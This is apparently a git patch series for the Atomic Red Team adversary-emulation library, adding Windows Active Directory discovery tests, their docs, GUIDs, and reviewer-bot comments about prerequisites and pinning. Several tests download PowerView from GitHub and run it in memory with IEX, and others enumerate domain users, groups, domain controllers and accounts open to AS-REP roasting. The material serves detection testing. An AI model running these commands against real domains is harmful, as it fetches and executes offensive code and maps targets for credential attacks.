@@ -55280,6 +55306,71 @@ discovery: executor: command: "#{adfind_path} -f (objectcategory=group)\n" name: command_prompt + - name: Enumerate Active Directory Groups with ADSISearcher + auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0 + description: | + The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. + Upon successful execution a listing of groups will output with their paths in AD. + Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne() + +' + - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) + auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 + description: | + When successful, accounts that do not require kerberos pre-auth will be returned. + Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Computer must be domain joined. + +' + prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) + {exit 0} else {exit 1} + +' + get_prereq_command: 'Write-Host Joining this computer to a domain must be + done manually. + +' + - description: 'Requires the Active Directory module for powershell to be installed. 
+ +' + prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit + 0} else {exit 1} + +' + get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" + +' + executor: + name: powershell + elevation_required: false + command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties + useraccountcontrol | Format-Table name + +' + - name: Get-DomainGroupMember with PowerView + auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145 + description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain + users. Upon execution, progress and info about groups within the domain being + scanned will be displayed. + +' + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" + name: powershell T1482: technique: external_references: @@ -57521,6 +57612,18 @@ discovery: Write-Host $Computer} name: powershell elevation_required: false + - name: Enumerate Active Directory Computers with ADSISearcher + auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d + description: | + The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. + Upon successful execution a listing of computers will output with their paths in AD. + Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() T1518.001: technique: id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384 
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index cb53f87d..3055bdc6 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -36,6 +36,8 @@ Specific to macOS, the bonjour protocol exists to discover addition - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher) +- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher) +
@@ -634,4 +636,34 @@ write-host "This PC must be manually added to a domain." +
+
+ +## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher +The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. +Upon successful execution a listing of computers will output with their paths in AD. +Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() +``` + + + + + +
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 478cf7a8..999930da 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -22,6 +22,12 @@ Commands such as net group /domain of the [Net](https://attack.mitr - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups) +- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher) + +- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting) + +- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview) +
@@ -308,4 +314,113 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste +
+
+ +## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher +The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. +Upon successful execution a listing of groups will output with their paths in AD. +Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne() +``` + + + + + + +
+
+ +## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) +When successful, accounts that do not require kerberos pre-auth will be returned. +Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must be domain joined. +##### Check Prereq Commands: +```powershell +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Write-Host Joining this computer to a domain must be done manually. +``` +##### Description: Requires the Active Directory module for powershell to be installed. +##### Check Prereq Commands: +```powershell +if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" +``` + + + + +
+
+ +## Atomic Test #11 - Get-DomainGroupMember with PowerView +Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" +``` + + + + + +
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 254f6d75..55e4e2bd 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -26,6 +26,8 @@ Commands such as net user /domain and net group /domain @@ -441,4 +443,34 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { +
+
+ +## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher +The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. +Upon successful execution a listing of users will output with their paths in AD. +Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 02e8be5a-3065-4e54-8cc8-a14d138834d3 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne() +``` + + + + + +
diff --git a/atomics/T1558.004/T1558.004.md b/atomics/T1558.004/T1558.004.md index 9d552e79..a294efbc 100644 --- a/atomics/T1558.004/T1558.004.md +++ b/atomics/T1558.004/T1558.004.md @@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003) - [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast) +- [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview) +
@@ -76,4 +78,33 @@ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable +
+
+ +## Atomic Test #2 - Get-DomainUser with PowerView +Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d6139549-7b72-4e48-9ea1-324fc9bdf88a + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose +``` + + + + + +
From 687da9235b38ced720bc961d2bc06bca88c4c1ad Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Mon, 14 Mar 2022 11:32:18 -0600 Subject: [PATCH 28/83] AD Enumeration - user/groups, pw policy (#1807) * More AD * fix conflict resolution mistake * add powershell Co-authored-by: Carrie Roberts --- atomics/T1018/T1018.yaml | 36 +++++++++++++++++++++++++++++++- atomics/T1069.002/T1069.002.yaml | 23 +++++++++++++++++++- atomics/T1087.002/T1087.002.yaml | 11 ++++++++++ atomics/T1201/T1201.yaml | 23 +++++++++++++++++++- 4 files changed, 90 insertions(+), 3 deletions(-) diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index 1f1212bb..b5460626 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml @@ -310,6 +310,18 @@ atomic_tests: Write-Host $Computer} name: powershell elevation_required: false +- name: Enumerate Active Directory Computers with Get-AdComputer + description: | + The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory. + Upon successful execution a listing of Computers will output with their paths in AD. + Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + Get-AdComputer -Filter * - name: Enumerate Active Directory Computers with ADSISearcher auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d description: | 
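Review bot: The new "Enumerate Active Directory Computers with Get-AdComputer" test runs `Get-AdComputer -Filter *`, which needs the ActiveDirectory PowerShell module and a domain-joined host, yet it declares no `dependencies`, so on a box without RSAT the runner reports a failed attack command instead of an unmet prerequisite. The Get-ADUser test added earlier in this series (T1069.002 #10) already carries prereq checks for exactly these two conditions; reusing that block here keeps the AD-module tests consistent. The enclosing `atomic_tests` list starts outside the hunk.

```yaml
- name: Enumerate Active Directory Computers with Get-AdComputer
  # … unchanged: description, supported_platforms …
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must be domain joined.
    prereq_command: |
      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
    get_prereq_command: |
      Write-Host Joining this computer to a domain must be done manually.
  - description: |
      Requires the Active Directory module for powershell to be installed.
    prereq_command: |
      if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
    get_prereq_command: |
      Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
  # … unchanged: executor …
```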
@@ -322,4 +334,26 @@ atomic_tests: name: powershell elevation_required: false command: | - ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() \ No newline at end of file + ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() +- name: Get-DomainController with PowerView + description: | + Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed. + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose + name: powershell +- name: Get-wmiobject to Enumerate Domain Controllers + description: | + The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers. + Upon successful execution a listing of Systems from AD will output with their paths. + Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1 + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + get-wmiobject -class ds_computer -namespace root\directory\ldap \ No newline at end of file diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index daebe0b7..0b8911c4 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml 
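Review bot: The test named "Get-wmiobject to Enumerate Domain Controllers" runs `get-wmiobject -class ds_computer -namespace root\directory\ldap` with no filter, which returns every computer object in the directory, not only domain controllers, so the name and the "enumerate Active Directory for Domain Controllers" description overstate what the command does. Either rename/describe it as computer enumeration (its own description already says "a listing of Systems from AD") or add a filter that selects DC accounts; the right filter should be confirmed in a lab before it is pinned into the description. Separately, the Get-DomainController test pulls PowerView from the `master` branch and pipes it straight into `IEX`, whereas the T1558.004 test in this series pins commit `f94a5d298a1b4c5dfb1f30a246d9c73d13b22888`; an unpinned URL executes whatever is served at run time and makes results non-reproducible, so prefer `IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose`. If these run under PowerShell 7, `Get-WmiObject` may not be available there and `Get-CimInstance` would be the replacement — worth confirming.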
@@ -133,6 +133,17 @@ atomic_tests: command: | #{adfind_path} -f (objectcategory=group) name: command_prompt +- name: Enumerate Active Directory Groups with Get-AdGroup + description: | + The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. + Upon successful execution a listing of groups will output with their paths in AD. + Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps + supported_platforms: + - windows + executor: + name: powershell + command: | + Get-AdGroup -Filter * - name: Enumerate Active Directory Groups with ADSISearcher auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0 description: | @@ -182,4 +193,14 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" - name: powershell \ No newline at end of file + name: powershell +- name: Get-DomainGroup with PowerView + description: | + Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed. + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose + name: powershell diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index fd3d98f1..6b58abdc 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml 
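Review bot: The new "Enumerate Active Directory Groups with Get-AdGroup" test omits `elevation_required: false`, which every neighbouring test in this hunk and the rest of the series declares, and it has no `dependencies` even though `Get-AdGroup -Filter *` requires the ActiveDirectory module and a domain-joined host. Add `elevation_required: false` under `executor`, and copy the two-entry dependencies block (domain membership check plus `Get-Module -ListAvailable -Name ActiveDirectory` with the `Add-WindowsCapability` get-prereq) from test #10 "Get-ADUser Enumeration using UserAccountControl flags" in this same file so the runner distinguishes a missing module from a failed command. The `atomic_tests` list begins outside the hunk.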
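Review bot: "Get-DomainGroup with PowerView" downloads PowerView from the unpinned `master` branch and executes it via `IEX` with no integrity check, so the executed code is whatever that URL serves at run time — a supply-chain exposure for a script that is routinely run on domain-joined hosts, and a reproducibility problem for detection engineering. The T1558.004 test added in this series pins `f94a5d298a1b4c5dfb1f30a246d9c73d13b22888`; the same pin should be used here: `IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose`. The other PowerView tests introduced in this patch (T1018, T1087.002, T1201) use the same unpinned URL and should be updated together. The executor also lacks `elevation_required: false`, which its siblings declare.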
@@ -214,6 +214,17 @@ atomic_tests: elevation_required: false command: | Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} + +- name: Get-DomainUser with PowerView + description: | + Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed. + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose + name: powershell - name: Enumerate Active Directory Users with ADSISearcher auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3 description: | diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml index 62a3041a..0a7c409c 100644 --- a/atomics/T1201/T1201.yaml +++ b/atomics/T1201/T1201.yaml 
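Review bot: The new test is named "Get-DomainUser with PowerView", which is byte-identical to the T1558.004 test #2 name already present in this series (GUID d6139549-…), so the two are indistinguishable in the generated indexes even though one lists all users and the other only pre-auth-disabled accounts; a distinguishing name such as `- name: Get-DomainUser with PowerView (all domain users)` avoids that. The command also pulls PowerView from unpinned `master` into `IEX`, unlike the T1558.004 test which pins commit `f94a5d298a1b4c5dfb1f30a246d9c73d13b22888`; pinning here keeps the executed code fixed and auditable. The stray empty `+` line inserted before `- name:` is harmless YAML but breaks the file's convention of tests following each other directly. The `atomic_tests` list begins outside the hunk.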
@@ -85,4 +85,25 @@ atomic_tests: executor: command: pwpolicy getaccountpolicies name: bash - +- name: Get-DomainPolicy with PowerView + description: | + Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. + supported_platforms: + - windows + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose + name: powershell +- name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy + description: | + The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy. + Upon successful execution a listing of the policy implemented will display. + Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + get-addefaultdomainpasswordpolicy \ No newline at end of file From 5e47dae27bdc609f6776f3af93510fb1784906da Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 17:32:49 +0000 Subject: [PATCH 29/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1018/T1018.yaml | 3 +++ atomics/T1069.002/T1069.002.yaml | 2 ++ atomics/T1087.002/T1087.002.yaml | 1 + atomics/T1201/T1201.yaml | 2 ++ atomics/used_guids.txt | 8 ++++++++ 5 files changed, 16 insertions(+) diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index b5460626..c1b676c6 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml 
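Review bot: "Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy" declares no `dependencies`, yet `get-addefaultdomainpasswordpolicy` only exists with the ActiveDirectory module and needs a domain-joined host, so a failure on a plain workstation will look like the technique failed rather than a missing prerequisite. Reuse the domain-joined check and the `if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}` / `Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"` pair that this series already uses for the Get-ADUser test in T1069.002. The companion "Get-DomainPolicy with PowerView" test loads PowerView from unpinned `master` via `IEX` and omits `elevation_required`; pinning the commit as T1558.004 #2 does would make the executed script fixed. The `atomic_tests` list begins outside the hunk.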
@@ -311,6 +311,7 @@ atomic_tests: name: powershell elevation_required: false - name: Enumerate Active Directory Computers with Get-AdComputer + auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf description: | The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory. Upon successful execution a listing of Computers will output with their paths in AD. @@ -336,6 +337,7 @@ atomic_tests: command: | ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne() - name: Get-DomainController with PowerView + auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4 description: | Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed. supported_platforms: @@ -346,6 +348,7 @@ atomic_tests: IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose name: powershell - name: Get-wmiobject to Enumerate Domain Controllers + auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad description: | The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers. Upon successful execution a listing of Systems from AD will output with their paths. diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index 0b8911c4..ca4b2d31 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml @@ -134,6 +134,7 @@ atomic_tests: #{adfind_path} -f (objectcategory=group) name: command_prompt - name: Enumerate Active Directory Groups with Get-AdGroup + auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 description: | The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. 
@@ -195,6 +196,7 @@ atomic_tests: IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" name: powershell - name: Get-DomainGroup with PowerView + auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230 description: | Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed. supported_platforms: diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index 6b58abdc..79f6cdf7 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -216,6 +216,7 @@ atomic_tests: Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} - name: Get-DomainUser with PowerView + auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2 description: | Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed. supported_platforms: diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml index 0a7c409c..43716efe 100644 --- a/atomics/T1201/T1201.yaml +++ b/atomics/T1201/T1201.yaml @@ -86,6 +86,7 @@ atomic_tests: command: pwpolicy getaccountpolicies name: bash - name: Get-DomainPolicy with PowerView + auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 description: | Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. supported_platforms: 
@@ -96,6 +97,7 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
     name: powershell
 - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+  auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
   description: |
     The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
     Upon successful execution a listing of the policy implemented will display.
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 80e8ed2f..b8ce28f8 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -890,3 +890,11 @@ a27418de-bdce-4ebd-b655-38f04842bf0c
 46352f40-f283-4fe5-b56d-d9a71750e145
 02e8be5a-3065-4e54-8cc8-a14d138834d3
 d6139549-7b72-4e48-9ea1-324fc9bdf88a
+97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+b9d2e8ca-5520-4737-8076-4f08913da2c4
+e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+5a8a181c-2c8e-478d-a943-549305a01230
+93662494-5ed7-4454-a04c-8c8372808ac2
+3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+b2698b33-984c-4a1c-93bb-e4ba72a0babb

From 1209d7b0f6fdfccbc9f02fb046bf24cd281b3194 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 14 Mar 2022 17:32:56 +0000
Subject: [PATCH 30/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  18 ++-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  18 ++-
 atomics/Indexes/Indexes-Markdown/index.md     |  18 ++-
 .../Indexes/Indexes-Markdown/windows-index.md |  18 ++-
 atomics/Indexes/index.yaml                    | 109 +++++++++++++++++-
 atomics/T1018/T1018.md                        |  99 +++++++++++++++-
 atomics/T1069.002/T1069.002.md                |  75 +++++++++++-
 atomics/T1087.002/T1087.002.md                |  35 +++++-
 atomics/T1201/T1201.md                        |  63 ++++++++++
 9 files changed, 422 insertions(+), 31 deletions(-)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4e598d60..01e8bc05 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -782,7 +782,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
-discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -791,9 +792,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
-discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
-discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
-discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
